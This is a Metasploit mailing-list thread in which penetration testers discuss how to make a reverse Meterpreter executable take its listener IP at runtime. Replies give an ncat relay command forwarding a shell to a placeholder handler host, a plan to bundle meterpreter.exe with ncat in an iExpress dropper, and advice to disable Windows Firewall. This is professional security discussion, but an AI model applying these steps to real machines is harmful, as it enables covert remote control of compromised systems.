Metasploit mailing list archives
Re: passing LHOST IP on command line
From: archeldeeb <archeldeeb () gmail com>
Date: Wed, 10 Nov 2010 16:36:56 +0300
Glad you found it useful. Beware that even though you are after a reverse connection, this method will open a listening port on the target machine, which will trigger any installed firewall, even Windows' one, so just as a reminder, make sure Windows Firewall is turned off.

Good luck finding a way to do it without that side effect.

Sherif Eldeeb

-----Original Message-----
From: Robin Wood <robin () digininja org>
Sent: 10 November, 2010 4:06 PM
To: Sherif El-Deeb <archeldeeb () gmail com>
Cc: framework () spool metasploit com; Oliver Kleinecke <okleinecke () web de>
Subject: Re: [framework] passing LHOST IP on command line

On 10 November 2010 13:02, Sherif El-Deeb <archeldeeb () gmail com> wrote:
> Even though I have no smart answer, I think you'll have to pack the
> meterpreter.exe with ncat.exe using iExpress and drop them at %tmp% or
> something, then do port forwarding:
>
> Multi/Handler : LPORT=4444
> Meterpreter: LHOST=127.0.0.1 LPORT=9999
> ncat -l 9999 -e "ncat MULTI_HANDLER_IP 4444"
>
> So, my final answer would be: one iExpress exe that contains
> meterpreter.exe that always connects to 127.0.0.1, ncat to do port
> forwarding, and an optional DOS batch file that will take the
> multi/handler's IP as a command argument "%1".

I'd say that was a pretty smart answer! If I don't get any ways to do it directly in the exe then this is what I'll be doing next time. And I agree that a batch file would be the best way to go.

Robin

> Regards,
> Sherif Eldeeb.
>
> On Wed, Nov 10, 2010 at 3:09 PM, Robin Wood <robin () digininja org> wrote:
>> On 10 November 2010 11:40, Oliver Kleinecke <okleinecke () web de> wrote:
>>> I'd suggest using the windows/meterpreter/reverse_tcp_dns payload, set
>>> its LHOST value to a dyndns name and set up a dyndns client on your
>>> listener host. Hope this helps =).
>>
>> Unfortunately on an internal test without internet access this won't help.
>>
>> Robin
>>
>>> best regards
>>> Oliver
>>>
>>> -----Original Message-----
>>> From: "Robin Wood" <robin () digininja org>
>>> Sent: 10.11.2010 11:41:28
>>> To: "Metasploit List" <framework () spool metasploit com>
>>> Subject: [framework] passing LHOST IP on command line
>>>
>>> Is it possible to build a reverse meterpreter exe that will take its
>>> LHOST as a command line argument rather than being hard coded?
>>>
>>> The scenario I have is:
>>>
>>> Got command line access to a Windows box through the windows psexec
>>> and managed to use tftp to bring files across to the compromised
>>> machine. I'd like to have generic 32 and 64 bit exes stored on my tftp
>>> server that I can copy across and then run them giving the IP of my
>>> multi handler machine.
>>>
>>> This just seems easier than having to compile a new exe on each job
>>> because my IP is different every time.
>>>
>>> Robin
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework